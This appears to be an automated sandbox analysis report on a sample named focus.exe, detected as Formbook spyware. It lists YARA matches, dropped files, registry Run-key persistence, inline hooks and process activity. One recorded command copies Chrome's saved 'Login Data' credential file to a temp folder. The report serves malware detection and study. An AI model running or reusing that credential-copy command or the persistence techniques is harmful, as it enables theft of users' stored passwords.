Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D9E30	24_2_003D9E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D9E2B	24_2_003D9E2B
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003D2FB0	24_2_003D2FB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00014040	29_2_00014040
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00109056	29_2_00109056
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000C6100	29_2_000C6100
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000E8140	29_2_000E8140
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00109176	29_2_00109176
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00091180	29_2_00091180
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0010D1A0	29_2_0010D1A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0003A1D0	29_2_0003A1D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00032210	29_2_00032210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000F2227	29_2_000F2227
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00088240	29_2_00088240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0002F250	29_2_0002F250
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00023270	29_2_00023270
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000312B0	29_2_000312B0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0005B400	29_2_0005B400
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000F2459	29_2_000F2459
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00041510	29_2_00041510
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0003A520	29_2_0003A520
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000475F0	29_2_000475F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00020650	29_2_00020650
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0001A690	29_2_0001A690
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0003B6D0	29_2_0003B6D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00026740	29_2_00026740
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000C2780	29_2_000C2780
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0010D800	29_2_0010D800
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0010C890	29_2_0010C890
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00029900	29_2_00029900
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0010691C	29_2_0010691C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00041910	29_2_00041910
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000FA9E0	29_2_000FA9E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00059A20	29_2_00059A20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0013DA40	29_2_0013DA40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0002FA70	29_2_0002FA70
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00031A90	29_2_00031A90
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0003DB10	29_2_0003DB10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00034C20	29_2_00034C20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000D1C40	29_2_000D1C40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000F9C52	29_2_000F9C52
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000D8CB0	29_2_000D8CB0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00020E10	29_2_00020E10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0001EE80	29_2_0001EE80
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_0004BED0	29_2_0004BED0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_000C2FA0	29_2_000C2FA0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_00047FE0	29_2_00047FE0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E54BE9C	32_2_6E54BE9C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E54FC23	32_2_6E54FC23
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E546D29	32_2_6E546D29
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E54FB03	32_2_6E54FB03
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E524B20	32_2_6E524B20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E577920	32_2_6E577920
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E53661F	32_2_6E53661F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E55D620	32_2_6E55D620
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5312F0	32_2_6E5312F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E53B295	32_2_6E53B295
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E54E372	32_2_6E54E372
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5363ED	32_2_6E5363ED
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E575020	32_2_6E575020
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E53D1F0	32_2_6E53D1F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E53E1B6	32_2_6E53E1B6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5361BB	32_2_6E5361BB

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 000E6420 appears 38 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 000122F0 appears 160 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 6E55C7C0 appears 137 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 6E52F9A0 appears 73 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 00058310 appears 67 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 6E530370 appears 56 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 6E5535F0 appears 55 times
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: String function: 0295B150 appears 136 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 04AFB150 appears 136 times

Source: focus.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: player-toolkit.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: focus.exe, 00000000.00000002.196953133.0000000002810000.00000002.00000001.sdmp

Binary or memory string: OriginalFilenameuser32j% vs focus.exe

Source: focus.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/15@1/1

Source: C:\Users\user\Desktop\focus.exe

0_2_00403348

Source: C:\Users\user\Desktop\focus.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040460D

Source: C:\Users\user\Desktop\focus.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\focus.exe

File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_01

Source: C:\Users\user\Desktop\focus.exe

File created: C:\Users\user\AppData\Local\Temp\nsv512F.tmp

Jump to behavior

Source: focus.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\focus.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\focus.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: focus.exe	Virustotal: Detection: 68%
Source: focus.exe	Metadefender: Detection: 26%
Source: focus.exe	ReversingLabs: Detection: 89%

Source: C:\Users\user\Desktop\focus.exe

File read: C:\Users\user\Desktop\focus.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\focus.exe 'C:\Users\user\Desktop\focus.exe'
Source: C:\Users\user\Desktop\focus.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'
Source: C:\Users\user\Desktop\focus.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe 'C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V	Jump to behavior

Source: C:\Users\user\Desktop\focus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\focus.exe

File written: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\config.ini

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: focus.exe

Static file information: File size 2844959 > 1048576

Source: focus.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: C:\workdir\build\Release_TS\IDMBrBtn\icu4c-57_1-src\obj\win3.pdb source: player-toolkit.exe, 00000002.00000002.358140994.0000000000164000.00000002.00020000.sdmp, wscript.exe, 00000018.00000002.463956730.00000000049EC000.00000004.00000001.sdmp, player-toolkit.exe, 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000000.426742087.0000000000164000.00000002.00020000.sdmp, player-toolkit.exe.0.dr
Source:	Binary string: D:\winx64-packages\Release\Release\PotPlayer\obj\Vi.pdb source: player-toolkit.exe, 00000002.00000002.359142610.000000006E4D6000.00000002.00020000.sdmp, player-toolkit.exe, 0000001D.00000002.464579995.000000006E616000.00000002.00020000.sdmp, player-toolkit.exe, 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp, libdisplay4-1.dll.0.dr
Source:	Binary string: wntdll.pdbUGP source: player-toolkit.exe, 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: player-toolkit.exe, wscript.exe
Source:	Binary string: wscript.pdb source: player-toolkit.exe, 00000002.00000003.357830256.0000000000B24000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.345964478.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Unpacked PE file: 2.2.player-toolkit.exe.10000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 29_2_0001C8D0 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,

29_2_0001C8D0

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_000268DD push 00000061h; retf	2_2_000268DF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_000269D2 push eax; retf	2_2_000269D9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_000271EC push edx; iretd	2_2_000271ED
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027A43 push esp; iretd	2_2_00027AB2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027A65 push esp; iretd	2_2_00027AB2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027AB9 push esp; iretd	2_2_00027AB2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027AED push esp; iretd	2_2_00027AB2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_00027D42 push edx; ret	2_2_00027D44
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002BE22 push edx; iretd	2_2_0002BE29
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CEA5 push eax; ret	2_2_0002CEF8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CEF2 push eax; ret	2_2_0002CEF8
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CEFB push eax; ret	2_2_0002CF62
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0002CF5C push eax; ret	2_2_0002CF62
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029AD0D1 push ecx; ret	2_2_029AD0E4
Source: C:\Windows\explorer.exe	Code function: 19_2_065C33E6 pushad ; ret	19_2_065C33E7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_04B4D0D1 push ecx; ret	24_2_04B4D0E4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E71EC push edx; iretd	24_2_003E71ED
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003EDA32 push esp; retf	24_2_003EDA34
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7A65 push esp; iretd	24_2_003E7AB2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7A43 push esp; iretd	24_2_003E7AB2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7AB9 push esp; iretd	24_2_003E7AB2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7AED push esp; iretd	24_2_003E7AB2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003EDBA4 push es; ret	24_2_003EDBAA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003E7D42 push edx; ret	24_2_003E7D44
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003EBE22 push edx; iretd	24_2_003EBE29
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003ECEA5 push eax; ret	24_2_003ECEF8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003ECEFB push eax; ret	24_2_003ECF62
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003ECEF2 push eax; ret	24_2_003ECEF8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 24_2_003ECF5C push eax; ret	24_2_003ECF62
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 29_2_001478AC push ecx; ret	29_2_001478BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E52FF4F push ecx; ret	32_2_6E52FF62

Source: C:\Users\user\Desktop\focus.exe	File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll	Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe	File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe	File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll	Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe	File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\libdisplay4-1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\focus.exe

File created: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\ReadMe.txt

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run K6M8V4IX5F			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE8

Source: C:\Users\user\Desktop\focus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
